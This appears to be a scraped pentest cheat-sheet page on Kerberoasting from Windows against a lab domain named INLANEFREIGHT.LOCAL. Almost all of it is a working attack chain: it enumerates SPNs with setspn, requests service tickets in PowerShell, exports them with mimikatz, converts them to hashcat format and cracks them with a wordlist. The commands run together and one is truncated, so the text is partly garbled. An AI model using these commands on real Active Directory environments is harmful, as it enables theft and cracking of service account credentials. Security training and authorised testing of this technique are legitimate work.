Kerberoasting - from Windows
setspn.exe -Q */*Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }mimikatz # base64 /out:true
mimikatz # kerberos::list /export cho "<base64 blob>" | tr -d \\n cat encoded_file | base64 -d > sqldev.kirbised 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcathashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt Rota automatizada/baseada em ferramentas
Usando Rubeus
Last updated